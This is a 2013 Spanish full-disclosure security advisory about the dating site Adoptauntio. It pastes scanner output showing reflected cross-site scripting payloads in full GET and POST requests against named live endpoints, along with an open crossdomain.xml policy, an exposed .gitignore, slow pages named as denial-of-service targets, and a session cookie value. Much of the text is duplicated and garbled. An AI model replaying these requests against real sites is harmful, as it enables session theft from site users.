Red Social española"Adoptauntio" Xss/ Insecure crossdomain / Sensitive files Disclosure/ D.O.S
Adopta un tio Anunciada en TV
========================================================================================================================================
ADOPTAUNTIO SOCIAL NETWORK Xss/ Insecure crossdomain / Sensitive files Disclosure / D.O.S / User credentials are sent in clear text
ADOPTAUNTIO SOCIAL NETWORK Xss/ Insecure crossdomain / Sensitive files Disclosure / D.O.S / User credentials are sent in clear text
========================================================================================================================================
TIME-LINE VULNERABILITY
Multiples Advisories but vendor Not Response
3/09/2013 Full Disclosure
3/09/2013 Full Disclosure
I. VULNERABILITY
————————-
#Title: ADOPTAUNTIO SOCIAL NETWORK Cross site scripting / Insecure crossdomain.xml file / Sensitive files Disclosure / Top 10 response times Denial Of Service / User credentials are sent in clear text
#Vendor:http://www.adoptauntio.es/
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
Twitter:@secnight
http://www.highsec.es
Twitter:@secnight
II. DESCRIPTION
————————-
————————-
It is a dating site for women who just arrived in Spain, inspired by the idea of Adopteunmec, a successful French website
Adoptauntio.es concept simple. The customer is king and in this case, clients.
Ladies first!
In the supermarket of dating, women find good bargains.
Want to meet women / men serious? Do you find your soul mate? To know new people? ? Enlarge your circle of friends?
AdoptaUnTio meets the needs of every single sweets, whether you’re a man looking for a woman woman looking for a man..
Adoptauntio.es concept simple. The customer is king and in this case, clients.
Ladies first!
In the supermarket of dating, women find good bargains.
Want to meet women / men serious? Do you find your soul mate? To know new people? ? Enlarge your circle of friends?
AdoptaUnTio meets the needs of every single sweets, whether you’re a man looking for a woman woman looking for a man..
III. PROOF OF CONCEPT
———————————
WorkArounds
Knowledge Base
List of file extensions
————————
————————
Description
File extensions can provide information on what technologies are being used on this website.
List of file extensions detected:
———————————
htm => 1 file(s)
txt => 1 file(s)
xml => 1 file(s)
gitignore => 1 file(s)
php => 2 file(s)
bak => 1 file(s)
php_bak => 1 file(s)
php_ => 1 file(s)
BAK => 1 file(s)
old => 1 file(s)
php_old => 1 file(s)
orig => 1 file(s)
bz2 => 2 file(s)
7z => 1 file(s)
temp => 1 file(s)
backup => 1 file(s)
000 => 1 file(s)
001 => 1 file(s)
php~ => 1 file(s)
php~1 => 1 file(s)
cs => 1 file(s)
vb => 1 file(s)
java => 1 file(s)
inc => 1 file(s)
0 => 1 file(s)
1 => 1 file(s)
2 => 1 file(s)
List of files with inputs
————————
———————————
htm => 1 file(s)
txt => 1 file(s)
xml => 1 file(s)
gitignore => 1 file(s)
php => 2 file(s)
bak => 1 file(s)
php_bak => 1 file(s)
php_ => 1 file(s)
BAK => 1 file(s)
old => 1 file(s)
php_old => 1 file(s)
orig => 1 file(s)
bz2 => 2 file(s)
7z => 1 file(s)
temp => 1 file(s)
backup => 1 file(s)
000 => 1 file(s)
001 => 1 file(s)
php~ => 1 file(s)
php~1 => 1 file(s)
cs => 1 file(s)
vb => 1 file(s)
java => 1 file(s)
inc => 1 file(s)
0 => 1 file(s)
1 => 1 file(s)
2 => 1 file(s)
List of files with inputs
————————
Description
These files have at least one input (GET or POST).
/ – 3 inputs
/auth/login – 3 inputs
/register – 2 inputs
/register/index – 1 inputs
/register/step2 – 1 inputs
/help/lostPwd – 1 inputs
/help/contactus – 1 inputs
/index – 2 inputs
/index.php – 1 inputs
List of external hosts
————————–
/ – 3 inputs
/auth/login – 3 inputs
/register – 2 inputs
/register/index – 1 inputs
/register/step2 – 1 inputs
/help/lostPwd – 1 inputs
/help/contactus – 1 inputs
/index – 2 inputs
/index.php – 1 inputs
List of external hosts
————————–
Description
These hosts were linked from this website but they were not scanned because they are out of scope..
s7.adoptauntio.es
s8.adoptauntio.es
s4.adoptauntio.es
s.adoptauntio.es
www.google.com
www.mozilla.org
s3.adoptauntio.es
s1.adoptauntio.es
twitter.com
www.facebook.com
market.android.com
itunes.apple.com
files.adopteunmec.com
script.weborama.fr
download.macromedia.com
cstatic.weborama.fr
static.criteo.net
s5.adoptauntio.es
s9.adoptauntio.es
adopteunmec.solution.weborama.fr
s0.adoptauntio.es
s6.adoptauntio.es
s8.adoptauntio.es
s4.adoptauntio.es
s.adoptauntio.es
www.google.com
www.mozilla.org
s3.adoptauntio.es
s1.adoptauntio.es
twitter.com
www.facebook.com
market.android.com
itunes.apple.com
files.adopteunmec.com
script.weborama.fr
download.macromedia.com
cstatic.weborama.fr
static.criteo.net
s5.adoptauntio.es
s9.adoptauntio.es
adopteunmec.solution.weborama.fr
s0.adoptauntio.es
s6.adoptauntio.es
Cross Site Scripting
*****************************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.
Affected items
/info.php
/info.php.BAK
/register/
/register/index
/info.php
/info.php.BAK
/register/
/register/index
/info.php
URI was set to 1<ScRiPt>prompt(930070)</ScRiPt>
The input is reflected inside a text element.
The input is reflected inside a text element.
GET /info.php/1%3CScRiPt%3Eprompt(930070)%3C/ScRiPt%3E
/info.php.BAK.
URI was set to 1<ScRiPt>prompt(981177)</ScRiPt>
The input is reflected inside a text element.
/info.php.BAK.
URI was set to 1<ScRiPt>prompt(981177)</ScRiPt>
The input is reflected inside a text element.
GET /info.php.BAK/1%3CScRiPt%3Eprompt(981177)%3C/ScRiPt%3E
/register/ (10)
/register/ (10)
URL encoded POST input sex was set to 1′ onmouseover=prompt(901376) bad=’
The input is reflected inside a tag parameter between single quotes.
The input is reflected inside a tag parameter between single quotes.
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1%27%20onmouseover%3dprompt%28901376%29%20bad%3d%27&year=1999&zipcode=94102
Variants
sex(6)
URL encoded POST input sex was set to 1′ onmouseover=prompt(901376) bad=’
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnightx&password_check=secnight&sex=1%27%20onmouseover%3dprompt%28901376%29%20bad%3d%27&year=1999&zipcode=94102
zipcode (3)
zipcode (3)
URL encoded POST input zipcode was set to 94102″ onmouseover=prompt(980712) bad=”
The input is reflected inside a tag parameter between double quotes.
The input is reflected inside a tag parameter between double quotes.
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1&year=1999&zipcode=94102%22%20onmouseover%3dprompt%28980712%29%20bad%3d%22
Insecure crossdomain.xml file
****************************************
The browser security model normally prevents web content from one domain from accessing data from another domain.
This is commonly known as the “same origin policy”. URL policy files grant cross-domain permissions for reading data.
They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory
of the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml).
This is commonly known as the “same origin policy”. URL policy files grant cross-domain permissions for reading data.
They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory
of the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml).
Affected Items
Web Server
<cross-domain-policy>
<allow-access-from domain=”*” />
</cross-domain-policy>
<allow-access-from domain=”*” />
</cross-domain-policy>
Sensitive files Disclosure
**********************************
Sensitive file has been found. This file is not directly linked from the website.
This check looks for common sensitive resources like password files, configuration files, log files,
include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.
**********************************
Sensitive file has been found. This file is not directly linked from the website.
This check looks for common sensitive resources like password files, configuration files, log files,
include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.
Affected items
/.gitignore
Denial Of Service (Top 10 response times)
**********************************************************
**********************************************************
The files listed bellow had the slowest response times measured during the penetration Testing
The average response time for this site was 723.08 ms.
These files could be targetted in denial of service attacks.
The average response time for this site was 723.08 ms.
These files could be targetted in denial of service attacks.
1. /register, response time 2699 ms
POST /register HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/register/index
POST /register HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/register/index
Accept: */*
captcha=1&city=San%20Francisco&country=es&day=03&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1&year=1999&zipcode=941022.
2 /help/lostPwd, response time 859 ms
GET /help/lostPwd HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
3. /help/contactus, response time 858 ms
POST /help/contactus HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
Content-Length: 664
Cookie: ES_AUMSESSID21=22320b9f030ab74c17a732a4ac81989adc09fd6c; aum_login_redirect=mobile
Host: www.adoptauntio.es
Content-Disposition: form-data; name=”check-captcha”
2 /help/lostPwd, response time 859 ms
GET /help/lostPwd HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
3. /help/contactus, response time 858 ms
POST /help/contactus HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
Content-Length: 664
Cookie: ES_AUMSESSID21=22320b9f030ab74c17a732a4ac81989adc09fd6c; aum_login_redirect=mobile
Host: www.adoptauntio.es
Content-Disposition: form-data; name=”check-captcha”
1
Content-Disposition: form-data; name=”ctc-mail”
User credentials are sent in clear text
******************************************************
******************************************************
User credentials are transmitted over an unencrypted channel.
This information should always be transferred via an encrypted channel (HTTPS) to avoid
being intercepted by malicious users.
This information should always be transferred via an encrypted channel (HTTPS) to avoid
being intercepted by malicious users.
Affected items
/
/index (cf14b7e692972470751e96464ce41375)
/landing
/register (c638a52f774a26f6d0ba89bced166ad2)
/register/index (a419e577064dab55f72b672987594b21)
/index (cf14b7e692972470751e96464ce41375)
/landing
/register (c638a52f774a26f6d0ba89bced166ad2)
/register/index (a419e577064dab55f72b672987594b21)
The impact of this vulnerability
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
How to fix this vulnerability
Because user credentials are considered sensitive information, should always be transferred to the server
over an encrypted connection (HTTPS).
over an encrypted connection (HTTPS).
IV. BUSINESS IMPACT
————————————
In social networks such failures ARE VERY DANGEROUS because (millions) users are vulnerable to attacks..
V SOLUTION
————————
————————
Very easy and I don´t understand… WRITE SECURE CODE P L E A S E !!
VI. CREDITS
————————-
This vulnerability has been discovered
by Juan Carlos García(@secnight)
by Juan Carlos García(@secnight)
VII. LEGAL NOTICES
————————-
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
caused by the use or misuse of this information.
Si os están adoptando en esta red social, ya sabeis lo que teneis que hacer …. cuidado a los barbudos !!
De la misma manera espero que sirva a la gente que tiene curiosidad por saber “como” y “forma” de un aviso de seguridad de aplicaciones web, pues ya tenéis un ejemplo válido para ello. Cada uno lo puede hacer como quiera, pero más o menos, tener presente los puntos que están marcados porque siempre es bueno dar toda la información posible o la que estimeis conveniente.
Un saludo
Juan Carlos García
Live Free Or Die Hacking